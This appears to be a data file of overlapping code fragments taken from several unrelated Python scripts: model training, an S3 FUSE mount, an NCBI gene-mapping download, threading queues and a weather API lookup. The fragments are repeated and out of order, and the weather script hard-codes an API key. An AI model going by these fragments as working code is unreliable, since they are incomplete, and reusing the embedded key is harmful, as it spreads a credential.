del_list.append(key)", "all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f", "= loss_.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss =", "is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\",", "prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device),", "args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running", "fp16 training.\") model = DDP(model) elif n_gpu > 1: model = torch.nn.DataParallel(model) #", "2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in range(0, nslot): fig, axs = plt.subplots(nturn, 1,", "logger.info(\" Num examples = %d\", len(dev_examples)) logger.info(\" Batch size = %d\", args.dev_batch_size) logger.info(\"", "[] label_info = '' label_map = [{_label: i for i, _label in enumerate(labels)}", "eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0,", "_get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid)", "= 0 for sid, slot in enumerate(class_count): slot_class_acc = 0 for vid, value", "model predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory", "= line[2] # line[2]: user utterance text_b = line[3] # line[3]: system response", "in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6'," ]
[ "sys import argv, exit import logging from fuse import FUSE if __name__ ==", "__name__ == '__main__': if len(argv) != 2: print('usage: %s <mountpoint>' % argv[0]) exit(1)", "-*- from s3encfs.s3fs import S3FS from sys import argv, exit import logging from", "exit import logging from fuse import FUSE if __name__ == '__main__': if len(argv)", "s3encfs.s3fs import S3FS from sys import argv, exit import logging from fuse import", "utf-8 -*- from s3encfs.s3fs import S3FS from sys import argv, exit import logging", "'__main__': if len(argv) != 2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG) fuse", "if len(argv) != 2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG) fuse =", "from s3encfs.s3fs import S3FS from sys import argv, exit import logging from fuse", "len(argv) != 2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG) fuse = FUSE(S3FS(),", "python #-*- coding: utf-8 -*- from s3encfs.s3fs import S3FS from sys import argv,", "from sys import argv, exit import logging from fuse import FUSE if __name__", "!= 2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG) fuse = FUSE(S3FS(), argv[1],", "FUSE if __name__ == '__main__': if len(argv) != 2: print('usage: %s <mountpoint>' %", "2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG) fuse = FUSE(S3FS(), argv[1], foreground=True)", "import argv, exit import logging from fuse import FUSE if __name__ == '__main__':", "import logging from fuse import FUSE if __name__ == '__main__': if len(argv) !=", "logging from fuse import FUSE if __name__ == '__main__': if len(argv) != 2:", "fuse import FUSE if __name__ == '__main__': if len(argv) != 2: print('usage: %s", "from fuse import FUSE if __name__ == '__main__': if len(argv) != 2: print('usage:", "S3FS from sys import argv, exit import logging from fuse import FUSE if", "== '__main__': if len(argv) != 2: print('usage: %s <mountpoint>' % argv[0]) exit(1) logging.basicConfig(level=logging.DEBUG)", "<gh_stars>0 #!/usr/bin/env python #-*- coding: utf-8 -*- from s3encfs.s3fs import S3FS from sys", "coding: utf-8 -*- from s3encfs.s3fs import S3FS from sys import argv, exit import", "#-*- coding: utf-8 -*- from s3encfs.s3fs import S3FS from sys import argv, exit", "#!/usr/bin/env python #-*- coding: utf-8 -*- from s3encfs.s3fs import S3FS from sys import", "import FUSE if __name__ == '__main__': if len(argv) != 2: print('usage: %s <mountpoint>'", "if __name__ == '__main__': if len(argv) != 2: print('usage: %s <mountpoint>' % argv[0])", "import S3FS from sys import argv, exit import logging from fuse import FUSE", "argv, exit import logging from fuse import FUSE if __name__ == '__main__': if" ]
[ "mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0,", "urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df = pd.concat( [ batch[batch.index ==", ") # delete the full file os.remove(args.filepath) # dump the mapping file mapping_df.to_csv(args.filepath,", "NCBI id mapping for humans.\"\"\" import os import argparse import urllib.request import pandas", "args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy", "where to store the file.', required=True ) if __name__ == '__main__': # parse", "for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete the", "pd.concat( [ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ],", "chunksize=10000) ], sort=False ) # delete the full file os.remove(args.filepath) # dump the", "if __name__ == '__main__': # parse arguments args = parser.parse_args() # download the", "# delete the full file os.remove(args.filepath) # dump the mapping file mapping_df.to_csv(args.filepath, sep='\\t')", "== TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) #", "sort=False ) # delete the full file os.remove(args.filepath) # dump the mapping file", "argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to store the file.', required=True )", "the latest NCBI id mapping for humans.\"\"\" import os import argparse import urllib.request", "batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete the full", "to store the file.', required=True ) if __name__ == '__main__': # parse arguments", ") if __name__ == '__main__': # parse arguments args = parser.parse_args() # download", "= argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to store the file.', required=True", "parser.add_argument( '-o', '--filepath', type=str, help='path where to store the file.', required=True ) if", "file.', required=True ) if __name__ == '__main__': # parse arguments args = parser.parse_args()", "required=True ) if __name__ == '__main__': # parse arguments args = parser.parse_args() #", "taxonomy data mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath,", "help='path where to store the file.', required=True ) if __name__ == '__main__': #", "parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to store the file.',", "args.filepath) # extract specific taxonomy data mapping_df = pd.concat( [ batch[batch.index == TAX_ID]", "<filename>ipcrg/resources/id_mapping/download_human_gene_mapping.py<gh_stars>1-10 \"\"\"Download the latest NCBI id mapping for humans.\"\"\" import os import argparse", "# extract specific taxonomy data mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for", "# parse arguments args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) #", "arguments args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific", "], sort=False ) # delete the full file os.remove(args.filepath) # dump the mapping", "= 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to store", "( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath',", "'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str,", "pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete the full file os.remove(args.filepath)", "parse arguments args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract", "import os import argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH = (", "data mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t',", "pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser()", "the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df = pd.concat( [", "import urllib.request import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID", "= ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o',", "\"\"\"Download the latest NCBI id mapping for humans.\"\"\" import os import argparse import", "'__main__': # parse arguments args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath)", "specific taxonomy data mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for batch in", "import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606", ") TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where", "extract specific taxonomy data mapping_df = pd.concat( [ batch[batch.index == TAX_ID] for batch", "= parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data", "argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' )", "batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False )", "TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to", "in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete the full file", "file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df = pd.concat( [ batch[batch.index", "parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df", "import argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz'", "'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path", "urllib.request import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID =", "# download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df =", "9606 parser = argparse.ArgumentParser() parser.add_argument( '-o', '--filepath', type=str, help='path where to store the", "latest NCBI id mapping for humans.\"\"\" import os import argparse import urllib.request import", "os import argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/'", "index_col=0, chunksize=10000) ], sort=False ) # delete the full file os.remove(args.filepath) # dump", "__name__ == '__main__': # parse arguments args = parser.parse_args() # download the file", "id mapping for humans.\"\"\" import os import argparse import urllib.request import pandas as", "mapping for humans.\"\"\" import os import argparse import urllib.request import pandas as pd", "sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete the full file os.remove(args.filepath) #", "[ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False", "= pd.concat( [ batch[batch.index == TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000)", "download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH, args.filepath) # extract specific taxonomy data mapping_df = pd.concat(", "'--filepath', type=str, help='path where to store the file.', required=True ) if __name__ ==", "as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser =", "type=str, help='path where to store the file.', required=True ) if __name__ == '__main__':", "TAX_ID] for batch in pd.read_csv(args.filepath, sep='\\t', index_col=0, chunksize=10000) ], sort=False ) # delete", "humans.\"\"\" import os import argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH =", "the file.', required=True ) if __name__ == '__main__': # parse arguments args =", "pandas as pd MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser", "for humans.\"\"\" import os import argparse import urllib.request import pandas as pd MAPPING_FTP_FILEPATH", "MAPPING_FTP_FILEPATH = ( 'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/' 'gene2accession.gz' ) TAX_ID = 9606 parser = argparse.ArgumentParser() parser.add_argument(", "store the file.', required=True ) if __name__ == '__main__': # parse arguments args", "'-o', '--filepath', type=str, help='path where to store the file.', required=True ) if __name__", "== '__main__': # parse arguments args = parser.parse_args() # download the file urllib.request.urlretrieve(MAPPING_FTP_FILEPATH," ]
[ "ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): # pragma: no cover", "mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel =", "List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload =", "component. The handle_request method raises ActionException or PermissionDenied if the request fails. \"\"\"", "from mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel", "= TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult =", "The handle_request method raises ActionException or PermissionDenied if the request fails. \"\"\" def", "TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): # pragma: no cover \"\"\" Interface", "if the request fails. \"\"\" def handle_request(self, payload: Payload, user_id: int) -> List[ActionResult]:", "ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} )", "or PermissionDenied if the request fails. \"\"\" def handle_request(self, payload: Payload, user_id: int)", "bool, \"message\": str}) class Action(Protocol): # pragma: no cover \"\"\" Interface for action", "PermissionDenied if the request fails. \"\"\" def handle_request(self, payload: Payload, user_id: int) ->", "from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\":", "Action(Protocol): # pragma: no cover \"\"\" Interface for action component. The handle_request method", "Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel]", "ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult", "str}) class Action(Protocol): # pragma: no cover \"\"\" Interface for action component. The", "# pragma: no cover \"\"\" Interface for action component. The handle_request method raises", "action component. The handle_request method raises ActionException or PermissionDenied if the request fails.", "\"\"\" Interface for action component. The handle_request method raises ActionException or PermissionDenied if", "import TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict(", "method raises ActionException or PermissionDenied if the request fails. \"\"\" def handle_request(self, payload:", "List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): # pragma: no", "raises ActionException or PermissionDenied if the request fails. \"\"\" def handle_request(self, payload: Payload,", "= TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): # pragma: no cover \"\"\"", "import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\":", "= List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload", "typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str,", "TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\",", "TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\",", "{\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool,", "no cover \"\"\" Interface for action component. The handle_request method raises ActionException or", "ActionException or PermissionDenied if the request fails. \"\"\" def handle_request(self, payload: Payload, user_id:", "Any, Dict, List from mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload =", "handle_request method raises ActionException or PermissionDenied if the request fails. \"\"\" def handle_request(self,", "Interface for action component. The handle_request method raises ActionException or PermissionDenied if the", "\"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\":", "= List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): # pragma:", "typing import Any, Dict, List from mypy_extensions import TypedDict from typing_extensions import Protocol", "from typing import Any, Dict, List from mypy_extensions import TypedDict from typing_extensions import", "the request fails. \"\"\" def handle_request(self, payload: Payload, user_id: int) -> List[ActionResult]: ...", ") Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol):", "class Action(Protocol): # pragma: no cover \"\"\" Interface for action component. The handle_request", "str, \"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\":", "import Any, Dict, List from mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload", "pragma: no cover \"\"\" Interface for action component. The handle_request method raises ActionException", "Dict, List from mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str,", "cover \"\"\" Interface for action component. The handle_request method raises ActionException or PermissionDenied", "\"data\": ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str})", "Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class Action(Protocol): #", "\"message\": str}) class Action(Protocol): # pragma: no cover \"\"\" Interface for action component.", "Protocol ActionPayload = List[Dict[str, Any]] ActionPayloadWithLabel = TypedDict( \"ActionPayloadWithLabel\", {\"action\": str, \"data\": ActionPayload}", "List from mypy_extensions import TypedDict from typing_extensions import Protocol ActionPayload = List[Dict[str, Any]]", "{\"success\": bool, \"message\": str}) class Action(Protocol): # pragma: no cover \"\"\" Interface for", "for action component. The handle_request method raises ActionException or PermissionDenied if the request", "ActionPayload} ) Payload = List[ActionPayloadWithLabel] ActionResult = TypedDict(\"ActionResult\", {\"success\": bool, \"message\": str}) class" ]
[ "queue.Queue() real = queue.Queue() def putData(): histStart = 0 realStart = 0 while", "def putData(): histStart = 0 realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart)", "not hist.empty(): print(hist.get()) def getReal(): while True: while not real.empty(): print(real.get()) if __name__", "while True: while not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start() threading.Thread(target=getHist).start() threading.Thread(target=getReal).start()", "= 0 realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart", "realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1", "putData(): histStart = 0 realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart", "hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart = realStart + 1 def", "realStart + 1 def getHist(): while True: while not hist.empty(): print(hist.get()) def getReal():", "hist = queue.Queue() real = queue.Queue() def putData(): histStart = 0 realStart =", "1 realStart = realStart + 1 def getHist(): while True: while not hist.empty():", "= realStart + 1 def getHist(): while True: while not hist.empty(): print(hist.get()) def", "hist.empty(): print(hist.get()) def getReal(): while True: while not real.empty(): print(real.get()) if __name__ ==", "= 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart", "= queue.Queue() real = queue.Queue() def putData(): histStart = 0 realStart = 0", "print(hist.get()) def getReal(): while True: while not real.empty(): print(real.get()) if __name__ == \"__main__\":", "real.put(realStart) histStart = histStart - 1 realStart = realStart + 1 def getHist():", "while not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start() threading.Thread(target=getHist).start() threading.Thread(target=getReal).start() while True:", "= queue.Queue() def putData(): histStart = 0 realStart = 0 while True: time.sleep(1)", "real = queue.Queue() def putData(): histStart = 0 realStart = 0 while True:", "histStart - 1 realStart = realStart + 1 def getHist(): while True: while", "time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart = realStart + 1", "while True: while not hist.empty(): print(hist.get()) def getReal(): while True: while not real.empty():", "queue.Queue() def putData(): histStart = 0 realStart = 0 while True: time.sleep(1) hist.put(histStart)", "def getReal(): while True: while not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start()", "1 def getHist(): while True: while not hist.empty(): print(hist.get()) def getReal(): while True:", "while not hist.empty(): print(hist.get()) def getReal(): while True: while not real.empty(): print(real.get()) if", "getHist(): while True: while not hist.empty(): print(hist.get()) def getReal(): while True: while not", "= histStart - 1 realStart = realStart + 1 def getHist(): while True:", "True: while not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start() threading.Thread(target=getHist).start() threading.Thread(target=getReal).start() while", "histStart = histStart - 1 realStart = realStart + 1 def getHist(): while", "- 1 realStart = realStart + 1 def getHist(): while True: while not", "getReal(): while True: while not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start() threading.Thread(target=getHist).start()", "def getHist(): while True: while not hist.empty(): print(hist.get()) def getReal(): while True: while", "not real.empty(): print(real.get()) if __name__ == \"__main__\": threading.Thread(target=putData).start() threading.Thread(target=getHist).start() threading.Thread(target=getReal).start() while True: pass", "0 realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart -", "while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart = realStart", "histStart = 0 realStart = 0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart =", "0 while True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart =", "queue, threading, time hist = queue.Queue() real = queue.Queue() def putData(): histStart =", "realStart = realStart + 1 def getHist(): while True: while not hist.empty(): print(hist.get())", "True: while not hist.empty(): print(hist.get()) def getReal(): while True: while not real.empty(): print(real.get())", "threading, time hist = queue.Queue() real = queue.Queue() def putData(): histStart = 0", "+ 1 def getHist(): while True: while not hist.empty(): print(hist.get()) def getReal(): while", "time hist = queue.Queue() real = queue.Queue() def putData(): histStart = 0 realStart", "import queue, threading, time hist = queue.Queue() real = queue.Queue() def putData(): histStart", "<reponame>waltoncade/KSD_GroundSystems<gh_stars>1-10 import queue, threading, time hist = queue.Queue() real = queue.Queue() def putData():", "True: time.sleep(1) hist.put(histStart) real.put(realStart) histStart = histStart - 1 realStart = realStart +" ]
[ "latitude and longitute coordinates via the wunderground API. Inputs: coord: string representing comma-separated", "'.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions", "+ name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy =", "= coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/'", "comma-separated coordinates. Outputs: weatherData: tuple of city, country, temp in F, sunrise time,", "API key is valid. ''' name = coord + '.json' try: f =", "json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country']", "= json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin =", "import os #def get_wunderkey() def get_data(coord): ''' Purpose: The purpose of this script", "= parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr", "parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr + \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr =", "sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin", "Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData: tuple of city, country, temp", "+ \":\" + sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr", "''' name = coord + '.json' try: f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m", "f = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read()", "city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr", "sunsetHr + \":\" + sunsetMin weatherData = {'city': city, 'country': country, 'temp': temp,", "The purpose of this script is to retrieve meteorological data of a given", "temp in F, sunrise time, sunset time. Returns: dictionary with 5 keys. Assumptions:", "to retrieve meteorological data of a given comma-separated latitude and longitute coordinates via", "sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" +", "time, sunset time. Returns: dictionary with 5 keys. Assumptions: The wunderground API key", "coord: string representing comma-separated coordinates. Outputs: weatherData: tuple of city, country, temp in", "urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/geolookup/conditions/q/' + name) m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions =", "= parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin weatherData", "f.read() parsedConditions = json.loads(conditions) astronomy = m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city']", "import json import sys import os #def get_wunderkey() def get_data(coord): ''' Purpose: The", "dictionary with 5 keys. Assumptions: The wunderground API key is valid. ''' name", "parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin weatherData =", "wunderground API key is valid. ''' name = coord + '.json' try: f", "sunsetMin weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset}", "weatherData: tuple of city, country, temp in F, sunrise time, sunset time. Returns:", "+ sunriseMin sunsetMin = parsedAstronomy['moon_phase']['sunset']['minute'] sunsetHr = parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\"", "= {'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception:", "the wunderground API. Inputs: coord: string representing comma-separated coordinates. Outputs: weatherData: tuple of", "= parsedAstronomy['moon_phase']['sunset']['hour'] sunset = sunsetHr + \":\" + sunsetMin weatherData = {'city': city,", "temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise = sunriseHr +", "{'city': city, 'country': country, 'temp': temp, 'sunrise': sunrise, 'sunset': sunset} except Exception: print", "purpose of this script is to retrieve meteorological data of a given comma-separated", "m = urllib2.urlopen('http://api.wunderground.com/api/3b566c79c371f7f4/astronomy/q/' + name) conditions = f.read() parsedConditions = json.loads(conditions) astronomy =", "a given comma-separated latitude and longitute coordinates via the wunderground API. Inputs: coord:", "astronomy = m.read() parsedAstronomy = json.loads(astronomy) city = parsedConditions['location']['city'] country = parsedConditions['location']['country'] temp", "print (\"Unable to retrieve data: \", sys.exc_info()[0]) weatherData = None finally: return weatherData", "= parsedConditions['location']['country'] temp = parsedConditions['current_observation']['temp_f'] sunriseMin = parsedAstronomy['moon_phase']['sunrise']['minute'] sunriseHr = parsedAstronomy['moon_phase']['sunrise']['hour'] sunrise =", "''' Purpose: The purpose of this script is to retrieve meteorological data of", "+ \":\" + sunsetMin weatherData = {'city': city, 'country': country, 'temp': temp, 'sunrise':", "try: f = 